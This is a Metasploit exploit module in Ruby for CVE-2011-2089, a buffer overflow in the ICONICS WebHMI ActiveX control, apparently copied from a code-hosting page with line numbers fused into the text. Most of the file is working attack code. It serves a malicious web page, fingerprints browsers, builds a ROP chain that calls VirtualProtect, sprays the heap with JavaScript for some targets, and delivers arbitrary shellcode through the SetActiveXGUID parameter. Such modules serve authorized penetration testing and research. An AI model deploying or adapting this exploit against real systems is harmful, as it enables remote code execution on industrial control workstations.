Path: blob/master/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::HttpServer::HTML910def initialize(info = {})11super(12update_info(13info,14'Name' => "ICONICS WebHMI ActiveX Buffer Overflow",15'Description' => %q{16This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.17By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll18fails to do any proper bounds checking before this input is copied onto the stack,19which causes a buffer overflow, and results arbitrary code execution under the context20of the user.21},22'License' => MSF_LICENSE,23'Author' => [24'Scoot Bell <scott.bell[at]security-assessment.com>',25'Blair Strang <blair.strang[at]security-assessment.com>',26'sinn3r', # Metasploit port27],28'References' => [29['CVE', '2011-2089'],30['OSVDB', '72135'],31['URL', 'http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf'],32['EDB', '17240'],33['URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02']34],35'Payload' => {36'BadChars' => "\x00",37'StackAdjustment' => -3500,38},39'DefaultOptions' => {40'EXITFUNC' => "seh",41'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',42},43'Platform' => 'win',44'Targets' => [45[46'Automatic', {}47],48[49'IE 6/7/8 on Windows XP SP3',50{51'Offset' => 510, # Offset to where ROP gadgets begin52'Ret' => 0x770167b0, # PUSH ESP; POP EBP; RETN 853'Max' => 4500, # Max buffer size used54},55],56[57'IE 7 on Windows Vista',58{59'Ret' => 0x0c0c0c0c, # Target spray60'blockSize' => "0x1000",61'spraySize' => "0x8500",62'Max' => 4500,63},64],65],66'Privileged' => false,67'DisclosureDate' => '2011-05-05',68'DefaultTarget' => 0,69'Notes' => {70'Reliability' => UNKNOWN_RELIABILITY,71'Stability' => UNKNOWN_STABILITY,72'SideEffects' => UNKNOWN_SIDE_EFFECTS73}74)75)76end7778def junk79return rand_text(4).unpack("L")[0].to_i80end8182def repeat(addr, rep)83arr = []84rep.times { arr << addr }85return arr86end8788def on_request_uri(cli, request)89my_target = ''90agent = request.headers['User-Agent']9192if agent =~ /NT 5\.1/ and agent =~ /MSIE (6|7)\.\d/93my_target = targets[2]94elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.\d/95my_target = targets[2]96elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/97my_target = targets[1]98else99send_not_found(cli)100print_error("Unknown User-Agent")101return102end103104js = ''105sploit = ''106107if my_target['spraySize'] == nil108109# ROP tekniq is only used against IE 8 + XP SP3 (ENG), since the gadgets are specific110# to the service pack (non or fully patched)111112rop_gadgets = [113my_target.ret,114junk,1150x7e45c67f, # XCHG EAX,EBP; RETN (USER32.dll)116repeat(junk, 2),1170x7e440639, # ADD ESP,10; POP EDI; POP ESI; POP EBX; RETN USER32.dll1180x7c801ad4, # Kernel32.VirtualProtect119junk, # Initial ESP + 8 p1 = retaddr120junk, # p2 - lpaddr121junk, # p3 - size122junk, # p4 - perms123junk, # p5 - oldperms124junk,125# Return address1260x7e4462ed, # XCHG EAX,ECX; RETN (USER32.dll)1270x7c902b50, # MOV EDX, ECX; RETN (ntdll.dll)128repeat(0x77aa2d96, 20), # INC ECX * 21 (CRYPT32.dll)1290x7c901726, # MOV EAX, EDX; RETN (ntdll.dll)130repeat(0x5b86a17b, 2), # ADD EAX,7B; RETN * 2 (NETAPI32.dll)131repeat(0x77c34fbd, 2), # ADD EAX,5C; RETN * 2 (msvcrt.dll)1320x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll)133# Shellcode pointer134repeat(0x77aa2d96, 4), # INC ECX * 4 (CRYPT32.dll)1350x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll)136# Size (0x400 bytes)137repeat(0x77aa2d96, 4), # INC ECX * 4 (CRYPT32.dll)1380x7e721a99, # POP EAX; RETN (SXS.dll)1390x3BFFF9CB, # Value to XOR1400x7e7560b5, # XOR EAX,3bfffdcb (SXS.dll)1410x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (RPCRT4.dll)142# NewProtect143repeat(0x77aa2d96, 4), # INC ECX * 4 (CRYPT32.dll)1440x7E456160, # XOR EAX,EAX; RETN (USER32.dll)1450x7E4193BA, # ADD AL,3B (USER32.dll)146repeat(0x7E442074, 5), # INC EAX; RETN (USER32.dll)1470x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll)148# OldProtect149repeat(0x77aa2d96, 4), # INC ECX * 4 (CRYPT32.dll)1500x7e721a99, # POP EAX (SXS.dll)1510x10010570, # EAX (Wriable memory)1520x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll)153# Call VirtualProtect154repeat(0x7E421AAF, 20), # DEC ECX; RETN (USER32.dll)1550x7E4462ED, # XCHG EAX,ECX; RETN (USER32.dll)1560x7E45F257, # XCHG EAX,ESP; RETN (USER32.dll)157repeat(junk, 2), # Align shellcode158].flatten.pack('V*')159160sploit << Rex::Text.to_unescape(rand_text_alpha(my_target['Offset']), Rex::Arch.endian(target.arch))161sploit << Rex::Text.to_unescape(rop_gadgets, Rex::Arch.endian(target.arch))162sploit << Rex::Text.to_unescape(make_nops(80), Rex::Arch.endian(target.arch))163sploit << Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))164sploit << rand_text_alpha(my_target['Max'] - sploit.length)165166else167168# If we don't have to ROP, then we just spray against the rest of the targets169170shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))171target_ret = [my_target.ret].pack('V')172nops = Rex::Text.to_unescape(target_ret * 4, Rex::Arch.endian(target.arch))173sploit << Rex::Text.to_unescape(target_ret * (my_target['Max'] / 4), Rex::Arch.endian(target.arch))174175js_func_name = rand_text_alpha(rand(6) + 3)176js_var_blocks_name = rand_text_alpha(rand(6) + 3)177js_var_shell_name = rand_text_alpha(rand(6) + 3)178js_var_nopsled_name = rand_text_alpha(rand(6) + 3)179js_var_index_name = rand_text_alpha(rand(6) + 3)180181js = <<-EOS182<script>183function #{js_func_name}() {184var #{js_var_blocks_name} = new Array();185var #{js_var_shell_name} = unescape("#{shellcode}");186var #{js_var_nopsled_name} = unescape("#{nops}");187while (#{js_var_nopsled_name}.length < #{my_target['blockSize']}) { #{js_var_nopsled_name} += #{js_var_nopsled_name} };188for (var #{js_var_index_name}=0; #{js_var_index_name} < #{my_target['spraySize']}; #{js_var_index_name}++) {189#{js_var_blocks_name}[#{js_var_index_name}] = [ "" + #{js_var_nopsled_name} + #{js_var_shell_name} ].join("");190}191}192#{js_func_name}();193</script>194EOS195196end197198obj_id = rand_text_alpha(rand(6) + 3)199sploit_name = rand_text_alpha(rand(6) + 3)200201html = <<-EOS202<html>203<head>#{js}</head>204<body>205<object classid="clsid:D25FCAFC-F795-4609-89BB-5F78B4ACAF2C" id="#{obj_id}"></object>206<script>207var #{sploit_name} = unescape("#{sploit}");208#{obj_id}.SetActiveXGUID(#{sploit_name});209</script>210</body>211</html>212EOS213214html = html.gsub(/^ {4}/, "")215216print_status("Sending malicious page")217send_response(cli, html, { 'Content-Type' => 'text/html' })218end219end220221222